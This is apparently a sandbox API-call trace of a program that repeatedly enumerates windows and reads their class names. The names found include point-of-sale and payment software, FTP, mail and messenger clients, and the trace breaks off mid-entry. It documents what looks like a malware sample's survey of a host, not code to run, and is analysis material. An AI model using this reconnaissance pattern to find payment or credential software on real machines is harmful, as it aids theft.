[0232.690] GetClassNameA (in: hWnd=0x100c2, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0232.690] GetClassNameA (in: hWnd=0x100cc, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0232.690] GetClassNameA (in: hWnd=0x100d0, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0232.690] GetClassNameA (in: hWnd=0x10098, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0232.690] GetClassNameA (in: hWnd=0x100a6, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0232.690] GetClassNameA (in: hWnd=0x100ca, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0232.690] GetClassNameA (in: hWnd=0x1008c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0232.690] GetClassNameA (in: hWnd=0x20030, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="ATL:00007FFA00814120") returned 20 [0232.690] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0232.691] GetClassNameA (in: hWnd=0x100da, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0232.691] GetClassNameA (in: hWnd=0x10348, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="localRealityBankwnd") returned 19 [0232.691] GetClassNameA (in: hWnd=0x502f2, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0232.691] GetClassNameA (in: hWnd=0x20300, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.691] GetClassNameA (in: hWnd=0x2030c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="VSyncHelper-007A8B38-820ac57") returned 28 [0232.691] GetClassNameA (in: hWnd=0x3032c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0232.691] GetClassNameA (in: hWnd=0x2025a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0232.691] GetClassNameA (in: hWnd=0x20240, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Alternate Owner") returned 15 [0232.691] GetClassNameA (in: hWnd=0x2021c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.691] GetClassNameA (in: hWnd=0x301fa, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0232.691] GetClassNameA (in: hWnd=0x20336, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0232.691] GetClassNameA (in: hWnd=0x10340, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="likelyFinaloutwnd") returned 17 [0232.691] GetClassNameA (in: hWnd=0x1033a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="utg2_wnd") returned 8 [0232.691] GetClassNameA (in: hWnd=0x40088, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="active-chargewin") returned 16 [0232.691] GetClassNameA (in: hWnd=0x1034a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="kitchenBoxinsteadwin") returned 20 [0232.691] GetClassNameA (in: hWnd=0x10334, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="spcwin_") returned 7 [0232.691] GetClassNameA (in: hWnd=0x10332, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="spgagentservicewin") returned 18 [0232.691] GetClassNameA (in: hWnd=0x1032a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="omnipos_wnd") returned 11 [0232.691] GetClassNameA (in: hWnd=0x10324, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="isspos") returned 6 [0232.691] GetClassNameA (in: hWnd=0x102dc, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="trilliancls") returned 11 [0232.692] GetClassNameA (in: hWnd=0x10322, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="mxslipstream_class") returned 18 [0232.692] GetClassNameA (in: hWnd=0x1031a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="fposwindow") returned 10 [0232.692] GetClassNameA (in: hWnd=0x10312, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="edcsvr_class") returned 12 [0232.692] GetClassNameA (in: hWnd=0x1030e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="creditservice_wnd") returned 17 [0232.692] GetClassNameA (in: hWnd=0x102ce, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="skype") returned 5 [0232.692] GetClassNameA (in: hWnd=0x1030a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="centralcreditcard_cls") returned 21 [0232.692] GetClassNameA (in: hWnd=0x10304, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="ccv_server_class") returned 16 [0232.692] GetClassNameA (in: hWnd=0x10302, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="aldeloclass") returned 11 [0232.692] GetClassNameA (in: hWnd=0x102be, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="pidgin_") returned 7 [0232.692] GetClassNameA (in: hWnd=0x102fa, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="afr38") returned 5 [0232.692] GetClassNameA (in: hWnd=0x102f4, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="yahoomessengerclass") returned 19 [0232.692] GetClassNameA (in: hWnd=0x4009c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="accupos_app") returned 11 [0232.692] GetClassNameA (in: hWnd=0x102ae, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="notepad_wnd") returned 11 [0232.692] GetClassNameA (in: hWnd=0x102f0, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="winscp_app") returned 10 [0232.692] GetClassNameA (in: hWnd=0x102e6, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="whatsapp_app") returned 12 [0232.692] GetClassNameA (in: hWnd=0x102e8, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="webdrive_app") returned 12 [0232.692] GetClassNameA (in: hWnd=0x102da, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="smartftp_cls") returned 12 [0232.692] GetClassNameA (in: hWnd=0x102d8, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="thunderbird_cls") returned 15 [0232.692] GetClassNameA (in: hWnd=0x102c4, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="outlook_window") returned 14 [0232.692] GetClassNameA (in: hWnd=0x102c2, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="scriptftp_cls") returned 13 [0232.692] GetClassNameA (in: hWnd=0x102b6, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="operamail_app") returned 13 [0232.693] GetClassNameA (in: hWnd=0x1027e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="filezilla_window") returned 16 [0232.693] GetClassNameA (in: hWnd=0x102ac, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="ncftp_class") returned 11 [0232.693] GetClassNameA (in: hWnd=0x102a0, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="leechftpapp") returned 11 [0232.693] GetClassNameA (in: hWnd=0x102a2, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="icqwindow") returned 9 [0232.693] GetClassNameA (in: hWnd=0x10278, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="coreftp_") returned 8 [0232.693] GetClassNameA (in: hWnd=0x102a4, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="gmailnotifierpro_app") returned 20 [0232.693] GetClassNameA (in: hWnd=0x10296, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="fling") returned 5 [0232.693] GetClassNameA (in: hWnd=0x10294, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="foxmailincmailapp") returned 17 [0232.693] GetClassNameA (in: hWnd=0x10272, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="barca_wnd") returned 9 [0232.693] GetClassNameA (in: hWnd=0x1028a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="flashfxp_window") returned 15 [0232.693] GetClassNameA (in: hWnd=0x10268, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="alftpwnd") returned 8 [0232.693] GetClassNameA (in: hWnd=0x10280, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="far_class") returned 9 [0232.693] GetClassNameA (in: hWnd=0x10276, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="bitkinexwindow") returned 14 [0232.693] GetClassNameA (in: hWnd=0x1026c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="absolutetelnetwindow") returned 20 [0232.693] GetClassNameA (in: hWnd=0x1024c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Minute_Budget_themselves_window") returned 31 [0232.693] GetClassNameA (in: hWnd=0x10260, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="3dftpcls") returned 8 [0232.693] GetClassNameA (in: hWnd=0x10246, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="health_prove_opportunity_") returned 25 [0232.693] GetClassNameA (in: hWnd=0x10244, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="breakapp") returned 8 [0232.693] GetClassNameA (in: hWnd=0x1023a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="goodwnd") returned 7 [0232.693] GetClassNameA (in: hWnd=0x1023c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="itemStudysafecls") returned 16 [0232.693] GetClassNameA (in: hWnd=0x10230, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="structurecausebar") returned 17 [0232.694] GetClassNameA (in: hWnd=0x1021e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Question_app") returned 12 [0232.694] GetClassNameA (in: hWnd=0x10232, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="MemoryEverybodynaturecls") returned 24 [0232.694] GetClassNameA (in: hWnd=0x1022a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="PlayHitwin") returned 10 [0232.694] GetClassNameA (in: hWnd=0x10228, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="evening_wnd") returned 11 [0232.694] GetClassNameA (in: hWnd=0x10226, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="meanwin") returned 7 [0232.694] GetClassNameA (in: hWnd=0x10212, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="feel_wnd") returned 8 [0232.694] GetClassNameA (in: hWnd=0x10210, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="reachinvolvewnd") returned 15 [0232.694] GetClassNameA (in: hWnd=0x10214, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="action_Program_citizen_window") returned 29 [0232.694] GetClassNameA (in: hWnd=0x10208, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Myselfclass") returned 11 [0232.694] GetClassNameA (in: hWnd=0x30202, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="student_because_democratic_app") returned 30 [0232.694] GetClassNameA (in: hWnd=0x10206, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Sharewnd") returned 8 [0232.694] GetClassNameA (in: hWnd=0x201f8, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0232.694] GetClassNameA (in: hWnd=0x101e4, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0232.694] GetClassNameA (in: hWnd=0x201de, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0232.694] GetClassNameA (in: hWnd=0x2013e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IEFrame") returned 7 [0232.694] GetClassNameA (in: hWnd=0x101e6, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.694] GetClassNameA (in: hWnd=0x2015e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.694] GetClassNameA (in: hWnd=0x20142, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0232.694] GetClassNameA (in: hWnd=0x20140, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0232.694] GetClassNameA (in: hWnd=0x2013c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.694] GetClassNameA (in: hWnd=0x30020, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.695] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="ATL:00007FFA08097080") returned 20 [0232.695] GetClassNameA (in: hWnd=0x101be, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.695] GetClassNameA (in: hWnd=0x101b0, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0232.695] GetClassNameA (in: hWnd=0x101ac, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.695] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0232.695] GetClassNameA (in: hWnd=0x10126, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.695] GetClassNameA (in: hWnd=0x1012e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="TabletModeCoverWindow") returned 21 [0232.695] GetClassNameA (in: hWnd=0x101a0, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.695] GetClassNameA (in: hWnd=0x101a2, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.695] GetClassNameA (in: hWnd=0x1012c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0232.695] GetClassNameA (in: hWnd=0x10124, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0232.695] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0232.695] GetClassNameA (in: hWnd=0x10108, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0232.695] GetClassNameA (in: hWnd=0x10100, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0232.695] GetClassNameA (in: hWnd=0x100fc, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.695] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.695] GetClassNameA (in: hWnd=0x100f4, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.695] GetClassNameA (in: hWnd=0x200e0, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.695] GetClassNameA (in: hWnd=0x100ce, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0232.695] GetClassNameA (in: hWnd=0x2001e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0232.696] GetClassNameA (in: hWnd=0x20034, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0232.696] GetClassNameA (in: hWnd=0x20036, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0232.696] GetClassNameA (in: hWnd=0x2004c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0232.696] GetClassNameA (in: hWnd=0x101d4, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.696] GetClassNameA (in: hWnd=0x200f2, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.696] GetClassNameA (in: hWnd=0x200ee, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.696] GetClassNameA (in: hWnd=0x100ba, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0232.696] GetClassNameA (in: hWnd=0x2007c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0232.696] GetClassNameA (in: hWnd=0x20072, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0232.696] GetClassNameA (in: hWnd=0x4006e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0232.696] GetClassNameA (in: hWnd=0x10024, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0232.696] GetClassNameA (in: hWnd=0x10180, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0232.696] GetClassNameA (in: hWnd=0x30242, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0232.696] GetClassNameA (in: hWnd=0x100de, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0232.696] GetClassNameA (in: hWnd=0x1014c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.696] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.696] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.696] GetClassNameA (in: hWnd=0x1015c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.696] GetClassNameA (in: hWnd=0x10190, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.696] GetClassNameA (in: hWnd=0x100dc, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0232.696] GetClassNameA (in: hWnd=0x1008e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x1037c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x80326, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x20238, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x2020e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x20330, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x1037a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x10378, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x10376, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x10374, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x10370, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x1036e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x1036c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x1036a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x10364, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x10362, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x10360, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x1035e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x1035c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x1035a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.697] GetClassNameA (in: hWnd=0x20204, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x10358, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x10354, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x10352, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x1034e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x1034c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x10346, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x10344, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x10342, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x10338, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x1032e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x10328, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x1031e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x10318, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x10310, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x10308, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x102fe, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x102f8, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x102ec, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x102e2, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.698] GetClassNameA (in: hWnd=0x102e0, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.699] GetClassNameA (in: hWnd=0x102d6, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.699] GetClassNameA (in: hWnd=0x102d2, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.699] GetClassNameA (in: hWnd=0x102ca, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.699] GetClassNameA (in: hWnd=0x102c8, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.699] GetClassNameA (in: hWnd=0x102bc, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.699] GetClassNameA (in: hWnd=0x102ba, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.699] GetClassNameA (in: hWnd=0x102b2, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.699] GetClassNameA (in: hWnd=0x102a8, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.699] GetClassNameA (in: hWnd=0x10290, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.699] GetClassNameA (in: hWnd=0x1028e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.704] GetClassNameA (in: hWnd=0x10286, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.704] GetClassNameA (in: hWnd=0x10284, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.704] GetClassNameA (in: hWnd=0x10270, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.704] GetClassNameA (in: hWnd=0x10266, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.704] GetClassNameA (in: hWnd=0x10262, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.704] GetClassNameA (in: hWnd=0x10258, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.704] GetClassNameA (in: hWnd=0x10256, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.704] GetClassNameA (in: hWnd=0x10252, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.704] GetClassNameA (in: hWnd=0x10250, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.704] GetClassNameA (in: hWnd=0x1024e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.704] GetClassNameA (in: hWnd=0x1024a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] GetClassNameA (in: hWnd=0x10248, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] GetClassNameA (in: hWnd=0x1023e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] GetClassNameA (in: hWnd=0x10234, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] GetClassNameA (in: hWnd=0x10224, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] GetClassNameA (in: hWnd=0x10218, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] GetClassNameA (in: hWnd=0x10216, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] GetClassNameA (in: hWnd=0x20138, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] GetClassNameA (in: hWnd=0x101cc, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] GetClassNameA (in: hWnd=0x101ae, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] GetClassNameA (in: hWnd=0x100f8, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0232.705] GetClassNameA (in: hWnd=0x100ea, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] GetClassNameA (in: hWnd=0x20032, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] GetClassNameA (in: hWnd=0x2019e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] GetClassNameA (in: hWnd=0x1007e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] GetClassNameA (in: hWnd=0x20074, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0232.705] Sleep (dwMilliseconds=0x64) [0232.892] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0232.892] GetClassNameA (in: hWnd=0x100ec, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0232.893] GetClassNameA (in: hWnd=0x1014a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0232.893] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0232.893] GetClassNameA (in: hWnd=0x1011c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0232.893] GetClassNameA (in: hWnd=0x10120, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0232.893] GetClassNameA (in: 